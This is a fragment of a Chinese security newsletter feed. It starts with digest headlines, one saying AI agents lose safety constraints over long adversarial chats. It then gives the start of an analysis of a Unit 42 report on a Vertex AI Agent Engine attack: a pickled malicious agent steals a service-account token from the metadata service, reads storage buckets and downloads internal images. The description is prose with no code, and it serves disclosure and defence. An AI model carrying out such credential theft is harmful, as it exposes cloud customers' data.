0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://spaceraccoon.dev/discovering-negative-days-llm-workflows" target="_blank">https://spaceraccoon.dev/discovering-negative-days-llm-workflows</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Coding Agents. The Insider Threat You Installed Yourself：工具集成NOVA框架对抗提示检测能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.securitybreak.io/coding-agents-the-insider-threat-you-installed-yourself-35644a1d5409" target="_blank">https://blog.securitybreak.io/coding-agents-the-insider-threat-you-installed-yourself-35644a1d5409</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Slack 分享其安全调查代理架构，包含 Hub、Workers 和 Dashboard，代理能识别非调查重点的凭据泄露</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://slack.engineering/streamlining-security-investigations-with-agents" target="_blank">https://slack.engineering/streamlining-security-investigations-with-agents</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Promptfoo测试332个对抗场景，发现AI代理在15轮对话后失去安全训练约束</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.promptfoo.dev/blog/claude-code-attack" target="_blank">https://www.promptfoo.dev/blog/claude-code-attack</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Parsia 提出 AI-Native SAST 演进路径</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://parsiya.net/blog/wtf-is-ai-native-sast" target="_blank">https://parsiya.net/blog/wtf-is-ai-native-sast</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析SHA pinning在GitHub Actions和CI/CD中的局限性，讨论伪造提交的供应链攻击风险</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.vaines.org/posts/2026-03-24-the-comforting-lie-of-sha-pinning" target="_blank">https://www.vaines.org/posts/2026-03-24-the-comforting-lie-of-sha-pinning</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过追踪云日志中独特告警种类与日均告警量，实现主动威胁狩猎</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://unit42.paloaltonetworks.com/tracking-threat-groups-through-cloud-logging" target="_blank">https://unit42.paloaltonetworks.com/tracking-threat-groups-through-cloud-logging</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Plaid 将组织特定安全基线编码为 Semgrep 规则，实现自动修复漏洞和统一漏洞管理，通过软失败模式达到 95%+ 仓库覆盖率</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://plaid.com/blog/security-as-a-platform" target="_blank">https://plaid.com/blog/security-as-a-platform</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">删除IAM用户前未更新KMS密钥策略导致权限问题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sirantd.com/how-i-overlooked-the-problem-and-shot-myself-in-the-foot-06841414e1de" target="_blank">https://sirantd.com/how-i-overlooked-the-problem-and-shot-myself-in-the-foot-06841414e1de</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011283" src="https://wechat2rss.xlab.app/img-proxy/?k=4062a6b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCnEMuZ8QIiamuby5ctOakGcriaGSPFic7FnjglYwNR22U4qsj6Pty7ibmJbYia1R2Ym18yj5hQJvq69EZK6gzXPRpUjmurWd8WNw958%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011284" src="https://wechat2rss.xlab.app/img-proxy/?k=6cc5b54e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jClp6LPKGIY9OlUe9J0DPfv5jOpic4oQQSPwjuDNaARQUrGOicof0h94Yo4qiaCZ2QPmY9Faj6ueA2Mdia6pYSAHDVEJZQJpzP0v7hU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494916&amp;idx=1&amp;sn=b01106658b570c0d850fb0a21ccbb036&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.28-2026.4.3）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.28-2026.4.3）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494891&amp;idx=2&amp;sn=9fea43e1c6cc95791e2f62f236fdb987&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.21-2026.3.27）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.21-2026.3.27）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494762&amp;idx=1&amp;sn=ca8490675064f1b8b18de2a02a4134b5&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.14-2026.3.20）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.14-2026.3.20）</a></span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=95baa7f0&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494935%26idx%3D1%26sn%3D2087d14d42eb91ff972139ef7fefc5d5">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 10 Apr 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>AI安全案例分析 | Vertex AI 双面间谍攻击分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494930&amp;idx=1&amp;sn=85c69d8937cbb34f62acb40cd4cedc50</link>
      <description>Palo Alto Networks Unit 42 于 2026 年 3 月 31 日发布的报告，详细披露了 Google Cloud Vertex AI Agent Engine 中存在的一项严重安全风险。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-04-08 18:01</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c935e02e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnFt4gmI2nYLknibrp5B9W1ChiczMA8LFKFxUt7YYtLkzic68Jp6qMyKurRALF1zXKzF2R5e26E7XJ8hj7LibHtU20yYR6V4pc9IOM%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>Palo Alto Networks Unit 42 于 2026 年 3 月 31 日发布的报告，详细披露了 Google Cloud Vertex AI Agent Engine 中存在的一项严重安全风险。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011276" src="https://wechat2rss.xlab.app/img-proxy/?k=8001c91c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FuZT6kWW1jClmdrRrcYiautUCiapTmicvFHxcCm3TPZx8NfgiaC8lsJu2WviajbcZhicGX45gzkZTuHE0J3geWkwkVXsSRSLkfkOMm05iciaibZKdpl80%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">概述</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 3px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom: 3px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Palo Alto Networks Unit 42 于 2026 年 3 月 31 日发布的报告，详细披露了 Google Cloud Vertex AI Agent Engine 中存在的一项严重安全风险。攻击者可通过构造恶意 AI 代理，利用其默认服务账号的过高权限，在无需任何额外提权的情况下，实现数据窃取、内部镜像下载，甚至潜在的代码执行。</span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 攻击原理核心</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Vertex AI Agent Engine 在部署 AI 代理时，默认使用 Per-Project, Per-Product Service Agent（P4SA）服务账号，其格式通常为 service-@gcp-sa-aiplatform-re.iam.gserviceaccount.com。该账号被授予的权限范围远超代理实际运行所需，为攻击提供了可乘之机。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 攻击流程</span></span></strong></p></div></div></div></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011280" data-ratio="0.5037037" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=502a80f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmj1xE1gEvHE6zibJYArRAslHiaTOxuey2FwZictqGtyz7Bgc2ezoEIkjU0wrZW2yfRDpywAQaPibCOpuGe89NGzicFdTqibWqIIDy4A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过 Google Cloud Agent Development Kit（ADK）构建恶意代理，并将核心恶意代码打包成 pickle 格式的 code.pkl 文件；</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">代理运行时自动访问 Google 元数据服务，获取 P4SA 服务账号的访问令牌、项目信息以及 OAuth scopes；</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">利用获取到的凭证，读取消费者项目内的 Cloud Storage 存储桶内容；</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">进一步访问 Google 内部受限的 Artifact Registry 仓库（如 us-docker.pkg.dev/cloud-aiplatform-private/reasoning-engine），成功下载官方容器镜像、Dockerfile 及相关依赖文件。</span></p></li></ol><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">报告中完整展示了从凭证提取到跨项目资源访问的全过程。攻击者甚至从中获取了谷歌内部 Dockerfile 中硬编码的存储桶路径和项目信息。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 根本成因分析</span></span></strong></p></div></div></div></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">服务账号权限过度：</span></strong><span leaf="">P4SA默认拥有storage.buckets.get、storage.buckets.list、storage.objects.get等权限，能够遍历并读取项目内多数Cloud Storage资源。官方文档虽有记录，但实际部署时经常被忽略。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">不安全的序列化方式：</span></strong><span leaf="">Vertex AI Agent Engine使用Python pickle序列化代理代码。Python官方文档明确指出，从不可信来源加载pickle存在任意代码执行风险。攻击者修改code.pkl即可在运行时注入恶意操作。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">OAuth 2.0 scopes设置宽松：</span></strong><span leaf="">报告指出默认分配的 OAuth 2.0 scopes 过于宽松且无法编辑，这可能将访问范围扩展到 Google Workspace 服务（Gmail、Google Calendar、Google Drive 等）。这一默认配置属于结构性安全弱点。</span></p></li></ol><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: 